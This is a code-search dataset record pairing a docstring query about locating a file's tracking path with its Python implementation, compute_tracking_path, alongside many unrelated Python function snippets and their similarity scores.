eloc=\" + str(eloc) + \"\\n\")\n sloc = eloc - len(data) - 1\n self.debug(__name__ + \".updateCounts(): sloc=\" + str(sloc) + \"\\n\")\n FH.seek(sloc, os.SEEK_SET)\n cloc = FH.tell()\n self.debug(__name__ + \".updateCounts(): cloc=\" + str(cloc) + \"\\n\")\n myList = list()\n myList = data.split('=')\n icount = int(myList[1]) + 1\n FH.write(str(self.msgNum) + \"=\" + str(icount) + \"\\n\")\n else:\n self.debug(__name__ + \".updateCounts(): DEBUG3\\n\")\n FH.write(str(self.msgNum) + \"=1\" + \"\\n\")\n FH.lock('u')\n FH.close()\n except IOError as inst: # @UnusedVariable\n pass\n # self.logIt( __name__ + \".updateCounts(): Unable to open \" + fileName + \" for write.\" + \" => \" + str( inst.errno ) + \":\" + str( inst.strerror ) + \"\\n\" )\n # Endtry", "def Read_MapGen(filename,stats = False):\n from numpy import array\n with open(filename,'rt') as file_:\n data = [s.strip() for s in file_.readlines()]\n\n Shorelines = []\n segment = []\n for line in data:\n if line == \"# -b\": #New segment beginning\n if segment: Shorelines.append(array(segment))\n segment = []\n else:\n segment.append(map(float,string.split(line)))\n if segment: Shorelines.append(array(segment))\n\n if stats:\n NumSegments = len(Shorelines)\n NumPoints = False\n for segment in Shorelines:\n NumPoints = NumPoints + len(segment)\n AvgPoints = NumPoints / NumSegments\n print(\"Number of Segments: \", NumSegments)\n print(\"Average Number of Points per segment: \", AvgPoints)\n\n return Shorelines", "def loadData(self, file):\n self.data = batchImport(file, self.ps)", "def add_sysinfo(loot_id, filename):\n\n loot = get_loot_entry(loot_id)\n with open(filename, 'r') as f:\n sysinfo = f.read()\n if not sysinfo:\n return None\n f = StringIO(sysinfo)\n reader = csv.reader(f, delimiter=',')\n result = []\n for row in reader:\n result.append(row)\n if not result:\n return None\n result = dict(zip(result[0], result[1]))\n result['IPs'] = result['IPs'].split()\n result = json.dumps(result)\n loot.sysinfo = result\n _db.session.commit()\n log.info(\"Sysinfo entry added - %s\" % loot_id)", "def Read_MapGen(self, filename, stats = 0,AllLines=0):\n with open(filename,'rt') as file_:\n data = [s.strip() for s in file_]\n\n Shorelines = []\n segment = []\n for line in data:\n if line:\n if line == \"# -b\": #New segment beginning\n if segment: Shorelines.append(N.array(segment))\n segment = []\n else:\n segment.append([float(e) for e in line.split()])\n if segment: Shorelines.append(N.array(segment))\n\n if stats:\n NumSegments = len(Shorelines)\n NumPoints = 0\n for segment in Shorelines:\n NumPoints = NumPoints + len(segment)\n AvgPoints = NumPoints / NumSegments\n print(\"Number of Segments: \", NumSegments)\n print(\"Average Number of Points per segment: \", AvgPoints)\n if AllLines:\n Lines = []\n for segment in Shorelines:\n Lines.append(segment[0])\n for point in segment[1:-1]:\n Lines.append(point)\n Lines.append(point)\n Lines.append(segment[-1])\n return Lines\n else:\n return Shorelines", "def update_team_data(self, team_file, team_updates):\n data = self.read_team_data(team_file)\n with open(self.team_path + team_file, 'w') as f:\n for update in team_updates:\n data[update] = team_updates[update]\n json.dump(team_updates,f)\n f.close()\n return True", "def update_stats(self, stats, delta, sample_rate=1):\n if not isinstance(stats, list):\n stats = [stats]\n\n data = dict((stat, \"%s|c\" % delta) for stat in stats)\n self.send(data, sample_rate)", "def _load_tracker(self):\n\n if os.path.isfile(config.TRACKER_JSON):\n with self.__writelock, open(config.TRACKER_JSON, encoding='utf-8-sig') as f:\n d = json.loads(f.read())\n try:\n self.stats.previous_requests = d[self.maps.key]\n except KeyError:\n self.stats.previous_requests = 0\n else:\n self.stats.previous_requests = 0", "def update_plugin_data(self, entry):", "def set_stats(self, stats):\n self._stats = stats", "def calculate_stats(file_data: dict) -> dict:\n specifics = {\n 'assignments': 0,\n 'grade': 0,\n 'graded': 0,\n 'discussion': 0\n }\n for course in file_data['semester_no_dup_crn']:\n x = course.split(DELIMITER)\n if int(x[ASSIGNMENTS]) > 0:\n specifics['assignments'] += 1\n if int(x[GRADE]) > 2:\n specifics['grade'] += 1\n if int(x[GRADED]) > 0:\n specifics['graded'] += 1\n if int(x[DISCUSSION]) > 0:\n specifics['discussion'] += 1\n return {'semester': file_data['semester'],\n 'courses_with_usage': len(file_data['semester_no_dup_crn']),\n 'faculty_with_usage': len(file_data['semester_no_dup_r']),\n 'full_time': len(file_data['full_time']),\n 'total_full_time': file_data['len_full'],\n 'part_time': len(file_data['part_time']),\n 'total_part_time': file_data['len_part'],\n 'staff': len(file_data['staff']),\n 'specifics': specifics,\n 'total_courses': file_data['total_courses']}", "def update_data(self):\n for sai_id_key in self.if_id_map:\n namespace, sai_id = mibs.split_sai_id_key(sai_id_key)\n if_idx = mibs.get_index_from_str(self.if_id_map[sai_id_key])\n counter_table = self.namespace_db_map[namespace].get_all(mibs.COUNTERS_DB, \\\n mibs.counter_table(sai_id))\n if counter_table is None:\n counter_table = {}\n self.if_counters[if_idx] = counter_table\n\n\n self.lag_name_if_name_map, \\\n self.if_name_lag_name_map, \\\n self.oid_lag_name_map, _, _ = Namespace.get_sync_d_from_all_namespace(mibs.init_sync_d_lag_tables, self.db_conn)\n\n self.if_range = sorted(list(self.oid_name_map.keys()) + list(self.oid_lag_name_map.keys()))\n self.if_range = [(i,) for i in self.if_range]", "def LoadMapping(self, fname):\n\n M = [{} for i in range(N_ChanUIDS)]\n\n # Load Map:\n with open(fname, \"r\") as f:\n pass", "def readMembers(self):\n f = open('%s/raw_clumpmembers_%s' %(self.wd,self.file), 'rb')\n #Skip first and last entries from this array.\n data = np.fromfile(f, dtype='i')[1:-1]\n self.nclumps = max(data)\n members = {}\n # I think we don't want ID==0 as this refers to no clump (CHECK...)\n for clump in range(self.nclumps):\n membershold = np.argwhere(data==clump+1).flatten()\n members[clump] = membershold\n self.members = members", "def updateFileInfo(self, data, pid):\n self.db.updateLinkInfo(data)\n self.evm.dispatchEvent(\"packageUpdated\", pid)", "def updatestats(self):\n result = self.statsfromcounts(self.hypCountByScenario)\n self.pScenario = result[\"p\"]\n self.scenarioEntropy = result[\"entropy\"]", "def setStats(self, stats):\n self.stats = stats", "def updateMap(self):\n self.clearMap()\n self.neofetchwin, self.neofetch, self.values = self.detect_neofetch()\n self.neofetch_parser(self.values)", "def UpdateData(self,WaveName,Data):\n if (self.UseCache):\n FilePath = self.DataToFile(WaveName,Data)\n self.WaveNameMap[WaveName] = FilePath\n else:\n self.WaveNameMap[WaveName] = Data", "def update_json_file(self):\n with open(\"data/save.txt\", \"r+\") as file:\n dictionary = json.load(file)\n user = dictionary[\"Actual Username\"]\n dictionary[user].append(self.score)\n\n with open(\"data/save.txt\", \"w\") as file:\n json.dump(dictionary, file, indent=3, sort_keys=True)", "def update_data(self, start=None, end=None):\n if self.verbose:\n print(\"Updating data\")\n start, end = self.get_range(start, end)\n self.source_data = self.get_dict_from_range(start, end)\n for c in self.callbacks[\"update_data\"]:\n c()", "def stat_file(self, path, info):\n return {}", "def update_usage_stats(self):\n self._usage.increment_usage_stats()", "def __init__(self, stats_file):\n stats = dict()\n self._stats = dict()\n\n for line in stats_file:\n stat = next((regex.match(line).groupdict()\n for regex in FUZZER_STATS_RES if regex.match(line)),\n dict())\n stats.update(stat)\n\n if not stats:\n raise Exception('Empty fuzzer_stats file `%s`' % stats_file.name)\n\n # Automatically create class attributes based on the fuzzer_stats fields\n for k, v in stats.items():\n if k == 'command_line':\n afl_opts = None\n target_args = None\n getopt_error = None\n\n for afl_getopt in AFL_GETOPTS:\n try:\n afl_opts, target_args = getopt(v.split(), afl_getopt)\n break\n except GetoptError as e:\n getopt_error = e\n\n if not afl_opts or not target_args:\n raise getopt_error\n\n setattr(self, 'afl_cmdline', afl_opts)\n setattr(self, 'target_cmdline', target_args)\n else:\n # If convertable to a number, treat as a number\n try:\n v = float(v)\n except ValueError:\n pass\n\n setattr(self, k, v)\n self._stats[k] = v", "def process(self):\n self._processed = True\n # We need to load up previous section_maps info\n with open(os.path.join(self.home, 'section_maps'), 'rb') as _file:\n section_maps = pickle.load(_file)\n\n # This will ensure that sections persist with the same -a, -b nomenclature over time\n self.groups.section_maps = section_maps\n self.groups.period_info = {}\n\n super().process()", "def do_stat (self, line) :\n\t\tf = line.strip()\n\n\t\tif not f :\n\t\t\ttarget = self.__wd\n\n\t\telse :\n\t\t\tif self.exists(f) :\n\t\t\t\ttarget = self.__wd['content'][f]\n\t\t\telse :\n\t\t\t\treturn\n\n\t\tfor k in target.keys() :\n\t\t\tif k != 'content' :\n\t\t\t\tprint \"\t%s : %s\" % ( k, target[k] )", "def update_mod_database():\r\n\tmydb = database()\r\n\tcursor = mydb.cursor()\r\n\tmod_path = \"data/stats.json\"\r\n\tinfo = dict_from_json_file(mod_path)\r\n\tcursor.execute(\"DELETE FROM poe.mod\")\t# Clear table\r\n\tfor mod_type in info[\"result\"]:\r\n\t\tfor mod in mod_type[\"entries\"]:\r\n\t\t\tmod_id = mod[\"id\"]\r\n\t\t\tmod_text = mod[\"text\"]\r\n\t\t\tmod_type = mod[\"type\"]\r\n\t\t\t# If the mod has options we need to add these to the options table\r\n\t\t\tif \"option\" in mod:\r\n\t\t\t\tquery = \"INSERT INTO poe.mod (id, text, type, options) VALUES (%s, %s, %s, %s);\"\r\n\t\t\t\tval = (mod_id, mod_text, mod_type, 1)\r\n\t\t\t\tcursor.execute(query, val)\r\n\t\t\t\tfor option_mod in mod[\"option\"][\"options\"]:\r\n\t\t\t\t\toption_mod_id = option_mod[\"id\"]\r\n\t\t\t\t\toption_mod_text = option_mod[\"text\"]\r\n\t\t\t\t\tmod_query \t= \"INSERT INTO poe.options (mod_id, id, text) VALUES (%s, %s, %s)\"\r\n\t\t\t\t\tmod_val \t= (mod_id, option_mod_id, option_mod_text)\r\n\t\t\t\t\tcursor.execute(mod_query, mod_val)\r\n\t\t\t# If there are no mods, simply add the mod to the table\r\n\t\t\telse:\r\n\t\t\t\tquery = \"INSERT INTO poe.mod (id, text, type) VALUES (%s, %s, %s);\"\r\n\t\t\t\tval = (mod_id, mod_text, mod_type)\r\n\t\t\t\tcursor.execute(query, val)\r\n\tmydb.commit()", "def sum_ticks(file_path: str) -> dict:\n try:\n parsed_ticks = handle_replay(file_path)\n except zephyrus_sc2_parser.exceptions.ReplayDecodeError:\n print(f\"Error: replay could not be decoded {file_path}\")\n return\n except Exception:\n print(traceback.format_exc())\n return\n\n league = pathlib.Path(file_path).parent.name\n out = []\n for player in parsed_ticks:\n player_data = {'league': league, 'race': player.race}\n for type in parsed_ticks[player]:\n for datapoint in parsed_ticks[player][type]:\n player_data[type] = player_data.get(type, 0) + datapoint['percent']\n out.append(player_data)\n\n return out", "def load(self):\n file_name = common.RANK_FILE % (self.week.season.name, self.week.num)\n with open(file_name, 'r') as rank_file:\n for record in rank_file:\n team, score = common.parse(record)\n self.score[team] = score", "def register_stats(self, stats):\n assert stats.endswith(\".h5\") or stats.endswith(\".npy\")\n if stats.endswith(\".h5\"):\n mean = read_hdf5(stats, \"mean\").reshape(-1)\n scale = read_hdf5(stats, \"scale\").reshape(-1)\n else:\n mean = np.load(stats)[0].reshape(-1)\n scale = np.load(stats)[1].reshape(-1)\n self.register_buffer(\"mean\", torch.from_numpy(mean).float())\n self.register_buffer(\"scale\", torch.from_numpy(scale).float())\n logging.info(\"Successfully registered stats as buffer.\")", "def update_cds(self, line, cds):\n args = self.extract_cds_args(line)\n cds.add_indices(args['indices'])\n cds.add_phase(args['phase'])\n cds.add_identifier(args['identifier'])\n if 'score' in args:\n cds.add_score(args['score'])", "def gather_sample(self, stat_file, collector=None):\n if not collector:\n collector = {}\n # The file format is just a single line of all the fields.\n line = stat_file.readlines()[0]\n # Chop off first part which is the pid and executable file. The\n # executable file is terminated with a paren so just search for that.\n line = line[(line.find(\") \") + 2) :]\n fields = line.split()\n # Then the fields we want are just at fixed field positions in the\n # string. Just grab them.\n\n # See http://man7.org/linux/man-pages/man5/proc.5.html for reference on field numbers\n # Keep in mind that we chop first 3 values away (pid, command line, state), so you need to\n # subtract 3 from the field numbers from the man page (e.g. on the man page nice is number\n # 19, but in our case it's 16 aka 19 - 3)\n process_uptime = self.__get_uptime_ms() - self.calculate_time_ms(\n int(fields[19])\n )\n\n collector.update(\n {\n Metric(\"app.cpu\", \"user\"): self.__calculate_time_cs(int(fields[11])),\n Metric(\"app.cpu\", \"system\"): self.__calculate_time_cs(int(fields[12])),\n Metric(\"app.uptime\", None): process_uptime,\n Metric(\"app.nice\", None): float(fields[16]),\n Metric(\"app.threads\", None): int(fields[17]),\n Metric(\"app.mem.majflt\", None): int(fields[9]),\n Metric(\"app.io.wait\", None): int(fields[39])\n if len(fields) >= 39\n else 0,\n }\n )\n return collector", "def load(self):\n file = os.path.join(\"./data\", self.name + \".map\")\n with open(file) as fp:\n lines = fp.readlines()\n self.row, self.col = map(int, lines[0].split())\n self.default = int(lines[1]) # デフォルト値\n for line in lines[2:]: # マップデータを読み込む\n line = line.rstrip() # 改行除去\n self.map.append([int(x) for x in list(line)])", "def update_metadata(self, file_id, metadata):\n pass", "def collectStat(self, thread):\n\t\t# update average page load time\n\t\tif self.updated_count == 0:\n\t\t\tself.average_time = thread.load_time\n\t\telse:\n\t\t\tself.average_time = (self.average_time * self.updated_count + thread.load_time) / (self.updated_count + 1)\n\t\t# update stitistics by HTTP code\n\t\tif thread.code not in self.code_statistics:\n\t\t\tself.code_statistics[thread.code] = 1 \n\t\telse:\n\t\t\tself.code_statistics[thread.code] += 1\n\t\t# update count of processed pages\n\t\tself.updated_count += 1", "def collectGeneralStats(stats: DocStats, service):\n # Call the data from the api.\n file_meta = service.files().get(fileId=stats.general.id).execute()\n # Load in file stats\n stats.general.name = file_meta.get('title')\n stats.general.link = file_meta.get('selfLink')\n stats.general.creationDate = file_meta.get('createdDate')\n\n stats.timeline.setTimelineStart(stats.general.creationDate)", "def update_info_when_add(descriptor, rel_path_from_repository,\n mtime, file_sha1_hash, index_dict):\n # If the file is already tracked, update it\n if rel_path_from_repository in index_dict.keys():\n # If the file is already up to date, no need to rewrite.\n if (mtime == index_dict[rel_path_from_repository][0]\n and\n file_sha1_hash == index_dict[rel_path_from_repository][2]):\n return\n # Move the file descriptor to the correct position\n lseek(descriptor, index_dict[rel_path_from_repository][5], 0)\n # Update the timestamp. current sha1 hash, add sha1 hash\n update_file_index(descriptor, \" \".join([mtime,\n file_sha1_hash,\n file_sha1_hash]), 0)\n # Else add a new index line.\n else:\n lseek(descriptor, 0, 2)\n add_new_index(descriptor, mtime, file_sha1_hash,\n rel_path_from_repository)", "def add_stats(self):\n units = self.get_unit_map()\n for metric in self.raw_metrics:\n unit, metric_type = units.get(metric, (DEFAULT_UNIT, DEFAULT_TYPE))\n if metric_type == \"counter\":\n # Unit/Second\n unit = \"/\".join((unit, \"Second\"))\n self.add_derive_value(metric, unit, self.raw_metrics[metric], rate=True)\n else:\n self.add_gauge_value(metric, unit, self.raw_metrics[metric])", "def refresh(self):\n f = open(self._filepath, 'r')\n self._raw_sysfs_data = f.read()\n f.close()\n self._process_raw_data()", "def update_player_on_map():\n \n # Get's a constructed whole line from get_map_line()\n # Splits it and writes it one by one\n # Colours red if user has compass, and has previously discovered that position\n\n positions = (59, 61, 63, 65, 67, 69, 71, 73, 75, 77) # x coords of map tiles\n \n for i in range(1, 11):\n mapline = get_map_line(i)\n \n for mapdot in range(0, 10): # Split map line into 10 parts, and write them one by one\n whole_map_pos = ((i * 10) - 10) + mapdot # Use i to iterate through all the map lines\n if DISCOVERED[whole_map_pos] == \"Y\": # Fancy maths, works well for 10 x 10 grid\n mvaddstr(i, 59 + (mapdot * 2), mapline[mapdot], color_pair(DISCOVERED_MAP_COLOUR))\n else:\n mvaddstr(i, 59 + (mapdot * 2), mapline[mapdot], color_pair(MAP_COLOUR)) \n \n if LAST_LINE_HAD_PLYR: # Write the players avatar, and colour the players spot \n mvaddstr(i, positions[ZBPP], \"U\", color_pair(PLAYER_COLOUR) | A_BOLD)", "def collect_stat(self):\n\n cnstat_dict, ratestat_dict = self.get_cnstat()\n self.cnstat_dict.update(cnstat_dict)\n self.ratestat_dict.update(ratestat_dict)", "def setStatiFile(self, filename):\n self.statiFile = filename", "def gather_sample(self, stat_file, collector=None):\n\n if not collector:\n collector = {}\n\n for line in stat_file:\n # Each line has a format of:\n # Tag: Value\n #\n # We parse out all lines looking like that and match the stats we care about.\n m = re.search(r\"^(\\w+):\\s*(\\d+)\", line)\n if m is None:\n continue\n\n field_name = m.group(1)\n int_value = int(m.group(2))\n # FDSize is not the same as the number of open file descriptors. Disable\n # for now.\n # if field_name == \"FDSize\":\n # self.print_sample(\"app.fd\", int_value)\n if field_name == \"VmSize\":\n collector.update({Metric(\"app.mem.bytes\", \"vmsize\"): int_value * 1024})\n elif field_name == \"VmPeak\":\n collector.update(\n {Metric(\"app.mem.bytes\", \"peak_vmsize\"): int_value * 1024}\n )\n elif field_name == \"VmRSS\":\n collector.update(\n {Metric(\"app.mem.bytes\", \"resident\"): int_value * 1024}\n )\n elif field_name == \"VmHWM\":\n collector.update(\n {Metric(\"app.mem.bytes\", \"peak_resident\"): int_value * 1024}\n )\n return collector", "def update_data():\n pass", "def test_cache_stats(self):\n data = {'a': 'b'}\n stats_file = self._write('stats.json', data)\n settings = {\n 'webpack.stats_file': stats_file,\n }\n state = WebpackState(settings)\n stats = state.load_stats(cache=True)\n self.assertEqual(data, stats)\n with open(stats_file, 'w') as ofile:\n json.dump({'b': 'c'}, ofile)\n second_stats = state.load_stats(cache=True)\n self.assertEqual(second_stats, stats)", "def update(self, game, squares):\n try:\n with open(self.filename, mode='r+') as file:\n # Update the next player\n file.seek(0)\n file.write(game.next_player)\n # Update for each square\n for square in squares:\n col = square[0]\n col_index = ord(col.lower()) - 97 # ord('a') is 97\n row = square[1]\n row_index = int(row) - 1\n offset = row_index * 8 + col_index + 1\n value = game.board.get_square(col, int(row))\n file.seek(offset)\n file.write(value)\n except IOError as err:\n print(f\"Error saving file with random-access: {err}\")\n # Save the entire state instead\n self.save(game)" ]
[ "0.63213795", "0.61827755", "0.57400024", "0.5537577", "0.5465735", "0.5393763", "0.5373763", "0.5370881", "0.53650606", "0.5338288", "0.5331641", "0.52704084", "0.52475107", "0.5246663", "0.51833093", "0.5156864", "0.51413554", "0.51362735", "0.5133316", "0.51267594", "0.5123115", "0.51035655", "0.5100884", "0.5093227", "0.5091473", "0.5091051", "0.508375", "0.50814193", "0.5079507", "0.50784093", "0.50640965", "0.5057132", "0.50468343", "0.50415003", "0.50350577", "0.503412", "0.5024211", "0.49826127", "0.4979995", "0.497806", "0.4963144", "0.49569637", "0.49560505", "0.4953075", "0.49497113", "0.49300376", "0.4929611", "0.49228117", "0.4913967", "0.49127495", "0.49100643", "0.49050447", "0.49042726", "0.48930392", "0.48845652", "0.48751447", "0.4874142", "0.48655567", "0.48463687", "0.4843439", "0.48401874", "0.4830347", "0.48296082", "0.48219237", "0.4816875", "0.4811973", "0.48081046", "0.4806155", "0.47876874", "0.4781558", "0.47807962", "0.47734734", "0.47732753", "0.47712442", "0.47699028", "0.47677642", "0.47650453", "0.4762008", "0.47569183", "0.47540924", "0.47530255", "0.47522298", "0.47464505", "0.47460207", "0.4742043", "0.4739398", "0.47393876", "0.4738502", "0.47336861", "0.4724303", "0.47209793", "0.47179773", "0.47082528", "0.47063133", "0.46906552", "0.4687887", "0.46856666", "0.46846065", "0.4683505", "0.46824375" ]
0.63252497
0
Find the tracking file for the given file. Returns the last path mentioned in the file via a tracking tag or the equivalent thirdparty path given the file's path. If there is no file in the default path and no files mentioned within the file exist, returns None. Normally the thirdparty path must exist. Passing |check_exist|=False will bypass this check when it is not desired. An additional check is enabled by passing |check_uses_tag|=True. In this case the given file MUST use either a file track tag or another modification tag, before a tracking_path is returned. stats is a variable for keeping track of the status of the analyzer, which can be None.
def compute_tracking_path(stats, our_path, our_lines, do_lint_check=False, check_exist=True, check_uses_tags=False): tracking_path = staging.get_default_tracking_path(our_path) base_matcher = re.compile(re.escape(FILE_TRACK_TAG) + r' "([^\"]+)"') tag_matcher = re.compile(re.escape(REGION_START_TAG)) uses_any_tags = False next_lineno = 1 for line in our_lines: if stats: stats['lineno'] = next_lineno match = base_matcher.search(line) if match: tracking_path = match.group(1) if not os.path.exists(tracking_path) and stats: show_error(stats, 'Mod tracking path does not exist:\n' + line) if next_lineno > MAX_ARC_TRACK_SEARCH_LINES: show_error(stats, 'Tracking not allowed on line > %d' % MAX_ARC_TRACK_SEARCH_LINES) uses_any_tags = True break elif not uses_any_tags and tag_matcher.search(line): uses_any_tags = True next_lineno += 1 if (not do_lint_check and (uses_any_tags or not check_uses_tags) and next_lineno > MAX_ARC_TRACK_SEARCH_LINES): break if not tracking_path: return None if check_uses_tags and not uses_any_tags: return None if check_exist and not os.path.exists(tracking_path): return None return tracking_path
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _findfile(self, path):\n\n # Build list of possible local file paths\n if not self._isurl(path):\n # Valid local paths\n filelist = self._possible_names(path)\n # Paths in self._destpath\n filelist += self._possible_names(self.abspath(path))\n else:\n # Cached URLs in self._destpath\n filelist = self._possible_names(self.abspath(path))\n # Remote URLs\n filelist = filelist + self._possible_names(path)\n\n for name in filelist:\n if self.exists(name):\n if self._isurl(name):\n name = self._cache(name)\n return name\n return None", "def _locate_from_cache_file():\n path_file = os.path.join(_get_temp_dir(), _config.pathfile)\n return _read_file(path_file) if os.path.isfile(path_file) else None", "def _resolve_file_or_none(context_dir, conf, conf_file, has_args=False):\n if not conf:\n return None\n base1 = os.path.expanduser(context_dir)\n base2 = os.path.expanduser(conf)\n path = os.path.join(base1, base2)\n path = os.path.abspath(path) # This resolves \"/../\"\n if not os.path.exists(path):\n raise Exception(\"File does not exist: '%s'. This was \"\n \"referenced in the file '%s'.\" % (path, conf_file))\n return path", "def lookup(file, category='undefined'):\n path = os.path.join(self.base_path, doc, file)\n existing_path = os.path.exists(path) and path\n link = doc+'/'+file\n self.log.debug(' %s file %s' % (category, existing_path or\n path+\" (not found)\"))\n return existing_path, link", "def find_cue_path(self, path, verbose=False):\n meta = {}\n if('.flaccuesplit.' not in path and not os.path.exists(path)):\n try:\n path, meta = self._track_cache[path]\n except (AttributeError, NameError, TypeError, KeyError):\n # Not caching or not yet cached.\n raw_path = path\n dir_path = self.clean_path(os.path.dirname(path))\n files = os.listdir(dir_path)\n for cue_file in files:\n if(os.path.splitext(cue_file)[1] == '.cue'):\n try:\n # Don't use verbose here. Overly spammy.\n to_add, metadata, to_remove = self.get_cue_files(os.path.join(dir_path, cue_file))\n base_path = os.path.basename(path)\n if(base_path in to_add):\n path = to_add[base_path]\n meta = metadata[base_path]\n break\n except Exception:\n print(f'Error parsing {cue_file}:', file=sys.stderr, flush=True)\n import traceback\n traceback.print_exc()\n try:\n self._track_cache[raw_path] = (path, meta)\n except (AttributeError, NameError, TypeError):\n # Not caching.\n pass\n if(verbose):\n print(f'{raw_path} -> {path}', flush=True)\n return path, meta", "def file_exists(file_ref, config):\n find_fn = _find_file(config)\n if _is_remote(file_ref):\n _, file_ref = _get_id_fname(file_ref)\n return find_fn(file_ref)", "def _getFileLocalOrPath(filename, pathenv):\n if os.path.exists(filename):\n log.info( \"Using local file %s\", filename)\n return filename\n\n pathlist = os.getenv(pathenv,'').split(os.pathsep)\n resolvedfilename = FindFile(filename, pathlist, os.R_OK)\n if resolvedfilename:\n return resolvedfilename\n\n log.fatal(\"No file %s found locally nor in %s\" % (filename, os.getenv('CORAL_DBLOOKUP_PATH')) )\n return None", "def find_file(filename):\n for i in list(_ctx.include_paths) + [ os.path.dirname(_ctx.filename) ]:\n full_path = os.path.join(i, filename)\n if os.path.exists(full_path):\n return full_path\n return filename # failure gets handled later on", "def _findfile(self, path):\n return DataSource._findfile(self, self._fullpath(path))", "def test_get_track_path_returns_file_path_if_track_is_file(self, example_group, monkeypatch):\n monkeypatch.setattr(\"src.music.utils.get_track_list_root_directory\", MagicMock(return_value=\"root/dir/\"))\n monkeypatch.setattr(\"src.music.utils.os.path.isfile\", lambda x: True)\n track_list = example_group.track_lists[0]\n track = track_list.tracks[0]\n track.file = \"file.mp3\"\n path = utils.get_track_path(example_group, track_list, track)\n assert path == \"root/dir/file.mp3\"", "def checkFilePath(self, filename, searchpath=[]):\n\t\tif filename is None:\n\t\t\treturn None\n\t\telif os.path.isfile(filename):\n\t\t\treturn filename\n\t\telse:\n\t\t\t# Append current dir to searchpath and try each in turn\n\t\t\tsearchpath.append(os.path.dirname(__file__))\n\t\t\t# print(searchpath)\n\t\t\tfor folder in searchpath:\n\t\t\t\tfilepath = os.path.join(folder, filename)\n\t\t\t\tif os.path.isfile(filepath):\n\t\t\t\t\treturn filepath\n\n\t\t# File not found\n\t\treturn None", "def locate(tgt_fpath, survey):\n flen = os.stat(tgt_fpath).st_size\n fpaths = survey.get(flen, ())\n if not fpaths:\n return None\n\n for fbase_path in fpaths:\n # print(' '*5, tgt_fpath, fbase_path)\n if not filecmp.cmp(tgt_fpath, fbase_path, shallow=True):\n continue # early reject, try other candidates\n if filecmp.cmp(tgt_fpath, fbase_path, shallow=False):\n # identically equal\n return fbase_path\n\n return None", "def find(self, relative_path):\n found = list(self.grep(relative_path, lazy=True))\n if found:\n return found[0]\n\n return None", "def find_file(file_name):\n if (pathlib.Path(file_name).resolve()):\n file_name = str(file_name)\n logging.info(f' found {file_name}.')\n return file_name\n else:\n logging.error(f' no file {file_name} found for processing.')\n sys.exit()", "def _find_config_file(self) -> str or None:\n import os\n\n for path in self.paths:\n path = os.path.expanduser(path)\n for extension in self.file_extensions:\n for file_name in self.file_names:\n file_path = os.path.join(path, \"{}.{}\".format(file_name, extension))\n if os.path.isfile(file_path):\n return file_path\n\n return None", "def stat_file(self, path, info):\n return {}", "def storage_find_report_file(self, report_id, filename):\n return self._get_queryset(report_id=report_id, filename=filename).get()", "def locate_file(self, filename):\n return locate_file(filename, self.observatory)", "def get_track_info(dirpath, f):\n filepath = os.path.join(dirpath, f)\n track = mutagen.File(filepath)\n if not track:\n if filepath.endswith('.mp3') or filepath.endswith('.m4a'):\n raise ValueError('Skipped an mp3 or an m4a')\n return None\n\n cover = find_cover(dirpath)\n if isinstance(track.tags, mutagen.id3.ID3):\n return get_track_info_mp3(filepath, track.tags, track.info, cover)\n if isinstance(track.tags, mutagen.mp4.MP4Tags):\n return get_track_info_mp4(filepath, track.tags, track.info, cover)\n if isinstance(track, mutagen.oggopus.OggOpus):\n return get_track_info_opus(filepath, track.tags, track.info, cover)\n raise ValueError(\"No parser for file format\")", "def GetResultFile(self):\n\n file_path = self.configfile.map['ResultFilePath']\n\n # Check if several entrie\n if file_path is not None:\n if len(file_path) > 1:\n warning(\n 'Many path for the result file are setted ({}), I will take the first one'\n .format(file_path))\n file_path = file_path[0]\n\n # If the storing file is elsewhere\n if file_path != \"#\":\n sys.path.insert(0, file_path)\n base = DBASE.open('Anna')\n\n if base is not None:\n return base\n else:\n error(\n 'Cannot find Anna file in {}'\n .format(file_path))\n return None\n\n else:\n base = DBASE.open('Anna')\n if base is not None:\n return base\n else:\n error(\n 'Cannot find Anna file in {}'\n .format(file_path))\n return None", "def get_reffile(self, refs, detector):\n for key in refs:\n if detector in key:\n return refs[key]\n self.logger.error(\"WARNING: no file found for detector {} in {}\"\n .format(detector, refs))", "def file_stat(self, file_path):", "def find_file(file_path=None, args=None, locations=DEFAULT_LOCATIONS,\n file_name='weewx.conf'):\n\n # Start by searching args (if available)\n if file_path is None and args:\n for i in range(len(args)):\n if not args[i].startswith('-'):\n file_path = args[i]\n del args[i]\n break\n\n if file_path is None:\n for directory in locations:\n # If this is a relative path, then prepend with the\n # directory this file is in:\n if not directory.startswith('/'):\n directory = os.path.join(os.path.dirname(__file__), directory)\n candidate = os.path.abspath(os.path.join(directory, file_name))\n if os.path.isfile(candidate):\n return candidate\n\n if file_path is None:\n raise IOError(\"Unable to find file '%s'. Tried directories %s\" %\n (file_name, locations))\n elif not os.path.isfile(file_path):\n raise IOError(\"%s is not a file\" % file_path)\n\n return file_path", "def _get_existing_path(self, file_path):\n test_files_location = self._resource_config.test_files_location\n search_order = [\n os.path.join(test_files_location or \"\", file_path),\n os.path.join(test_files_location or \"\", self.reservation_id, file_path),\n file_path,\n ]\n for path in search_order:\n if os.path.exists(path):\n return path\n raise BPRunnerException(\n self.__class__.__name__,\n 'File {} does not exists or \"Test Files Location\" attribute was not specified'.format(file_path),\n )", "def _find_tif_file(self):\n name = self.results_file.name[:-12] + \".tif\"\n try:\n tif_file = next(self.results_file.parent.glob(name))\n return tif_file\n except StopIteration:\n print(f\"Tif not found for {name}\")\n return None", "def _real_stat(self, path, _exception_for_missing_path=True):\n # Save for error message.\n original_path = path\n # Most code in this method is used to detect recursive link structures.\n visited_paths = set()\n while True:\n # Stat the link if it is one, else the file/directory.\n lstat_result = self._real_lstat(path, _exception_for_missing_path)\n if lstat_result is None:\n return None\n # If the file is not a link, the `stat` result is the same as the\n # `lstat` result.\n if not stat.S_ISLNK(lstat_result.st_mode):\n return lstat_result\n # If we stat'ed a link, calculate a normalized path for the file\n # the link points to.\n dirname, _ = self._path.split(path)\n path = self._path.join(dirname, lstat_result._st_target)\n path = self._path.abspath(self._path.normpath(path))\n # Check for cyclic structure.\n if path in visited_paths:\n # We had seen this path already.\n raise ftputil.error.RecursiveLinksError(\n \"recursive link structure detected for remote path '{}'\".format(\n original_path\n )\n )\n # Remember the path we have encountered.\n visited_paths.add(path)", "def try_stat(path: str) -> Optional[os.stat_result]:\n result = Stat._result(path, throw=False)\n if isinstance(result, BaseException):\n return None\n return result", "def find_file(path):\n return NotImplemented", "def _resolve_relative_path(filepath: str):\n if not filepath:\n return None\n\n inf_path = os.path.join(os.path.dirname(__file__), 